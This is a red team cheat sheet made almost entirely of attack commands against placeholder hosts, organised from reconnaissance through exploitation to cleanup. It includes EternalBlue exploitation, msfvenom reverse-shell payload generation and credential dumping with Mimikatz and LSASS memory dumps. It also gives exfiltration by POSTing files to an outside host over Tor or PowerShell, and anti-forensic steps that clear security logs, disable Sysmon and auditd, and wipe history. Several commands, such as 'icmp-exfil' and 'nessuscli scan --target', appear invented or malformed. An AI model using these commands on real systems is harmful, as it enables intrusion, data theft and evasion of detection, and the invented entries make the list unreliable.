Red Team Operations Guide

1. Reconnaissance and Enumeration

Identify and gather information about the target, such as domains, subdomains, IP addresses, exposed services, and potential attack vectors.

Nmap

nmap -sV -sC -oA scan_result 192.168.1.1

Recon-ng

recon-ng -m recon/domains-hosts/brute_hosts

Amass

amass enum -d example.com

Sublist3r

sublist3r -d example.com

Shodan

shodan host 192.168.1.1

theHarvester

theHarvester -d example.com -b all

DNSenum

dnsenum example.com

Masscan

masscan 192.168.1.1 -p1-65535 --rate=1000

Whois

whois example.com

Dig

dig example.com ANY

Netdiscover

netdiscover -i eth0 -r 192.168.1.0/24

Fierce

fierce -dns example.com

Maltego

maltego

SpiderFoot

spiderfoot -l

Aquatone

aquatone-discover -d example.com

Assetfinder

assetfinder example.com

Findomain

findomain -t example.com

Knockpy

knockpy example.com

Httprobe

cat domains.txt | httprobe

Waybackurls

waybackurls example.com

2. Vulnerability Scanning

Identify vulnerabilities in exposed services and systems.

Nessus

nessuscli scan --target 192.168.1.1

OpenVAS

openvas-cli --target 192.168.1.1

Nikto

nikto -h http://example.com

OWASP ZAP

zap-cli quick-scan -o -r http://example.com

Burp Suite

burpsuite

Wapiti

wapiti -u http://example.com

WPScan

wpscan --url http://example.com

SQLMap

sqlmap -u http://example.com/page?id=1 --dbs

XSStrike

xsstrike -u http://example.com

Dirb

dirb http://example.com

Gobuster

gobuster dir -u http://example.com -w wordlist.txt

Nuclei

nuclei -u http://example.com

Retire.js

retire --path /var/www/html

Lynis

lynis audit system

Skipfish

skipfish -o output http://example.com

Arachni

arachni http://example.com

Vega

vega

Acunetix

acunetix

Netsparker

netsparker

3. Exploitation

Exploit identified vulnerabilities to gain initial access.

Metasploit

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploit

SQLMap

sqlmap -u http://example.com/page?id=1 --dbs

CrackMapExec

crackmapexec smb 192.168.1.1 -u admin -p password

Hydra

hydra -l admin -P passwords.txt ssh://192.168.1.1

John the Ripper

john --wordlist=passwords.txt hash.txt

Hashcat

hashcat -m 1000 hash.txt passwords.txt

Responder

responder -I eth0

Impacket

python3 smbclient.py -h 192.168.1.1

Empire

powershell-empire

Cobalt Strike

teamserver 192.168.1.1 password

BeEF

beef

Social-Engineer Toolkit (SET)

setoolkit

ExploitDB

searchsploit apache 2.4.29

Msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o payload.exe

Veil-Evasion

veil-evasion

Shellter

shellter

PowerSploit

Invoke-Mimikatz -DumpCreds

Mimikatz

mimikatz.exe privilege::debug sekurlsa::logonpasswords

BloodHound

bloodhound-python -d example.com -u user -p password

4. Post-Exploitation

Maintain access, escalate privileges, and move laterally within the network.

Mimikatz

mimikatz.exe privilege::debug sekurlsa::logonpasswords

PowerSploit

Invoke-Mimikatz -DumpCreds

BloodHound

bloodhound-python -d example.com -u user -p password

Empire

powershell-empire

Cobalt Strike

teamserver 192.168.1.1 password

Metasploit

meterpreter > getuid

PsExec

psexec \\192.168.1.1 -u admin -p password cmd.exe

WMI

wmic /node:192.168.1.1 process call create "cmd.exe"

Impacket

python3 psexec.py admin:password@192.168.1.1

Netcat

nc -lvp 4444

SSH

ssh user@192.168.1.1

RDP

xfreerdp /u:admin /p:password /v:192.168.1.1

Procdump

procdump.exe -ma lsass.exe lsass.dmp

Mimikatz (Offline)

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

LaZagne

laZagne.exe all

Windows Credential Editor (WCE)

wce.exe -w

Meterpreter

meterpreter > hashdump

PowerUp

Invoke-AllChecks

PrivescCheck

Invoke-PrivescCheck -Extended

5. Data Exfiltration

Extract sensitive data from the target stealthily.

DNSCAT2

dnscat2-server --secret=mysecret

Netcat

nc -lvp 4444 > file.txt

Rclone

rclone copy sensitive_data remote:backup

SCP

scp user@192.168.1.1:/path/to/file .

SFTP

sftp user@192.168.1.1

HTTP

python3 -m http.server 8080

FTP

ftp 192.168.1.1

ICMP

icmp-exfil -i eth0 -f file.txt

DNS

dns-exfil -d example.com -f file.txt

Email

sendemail -f from@example.com -t to@example.com -u "Subject" -m "Body" -a file.txt

Cloud Storage

aws s3 cp file.txt s3://mybucket/

Tor

torsocks curl -X POST -d @file.txt http://example.com

WebDAV

cadaver http://example.com/webdav

SSH Tunnel

ssh -L 8080:localhost:80 user@192.168.1.1

Metasploit

meterpreter > download file.txt

PowerShell

Invoke-WebRequest -Uri http://example.com -Method POST -Body (Get-Content file.txt)

Base64

base64 file.txt

Steganography

steghide embed -cf image.jpg -ef file.txt

Zip

zip -r archive.zip file.txt

Encryption

openssl enc -aes-256-cbc -salt -in file.txt -out file.enc

6. Covering Tracks

Remove evidence of the attack and cover tracks to avoid detection.

Timestomp

timestomp file.txt -m "01/01/2023 00:00:00"

CCleaner

ccleaner.exe /AUTO

BleachBit

bleachbit

Shred

shred -u file.txt

Rm

rm -rf file.txt

Event Viewer

wevtutil cl Security

Log Deletion

del /f /q C:\Windows\System32\LogFiles\*.*

IIS Logs

del /f /q C:\inetpub\logs\LogFiles\*.*

Apache Logs

rm -rf /var/log/apache2/*

Nginx Logs

rm -rf /var/log/nginx/*

Sysmon

sysmon -u

Auditd

auditctl -D

Firewall

netsh advfirewall reset

Registry

reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor

Task Scheduler

schtasks /delete /tn "Backdoor"

SSH

rm -rf ~/.ssh/known_hosts

Bash History

history -c

PowerShell History

Clear-History

Metasploit

meterpreter > clearev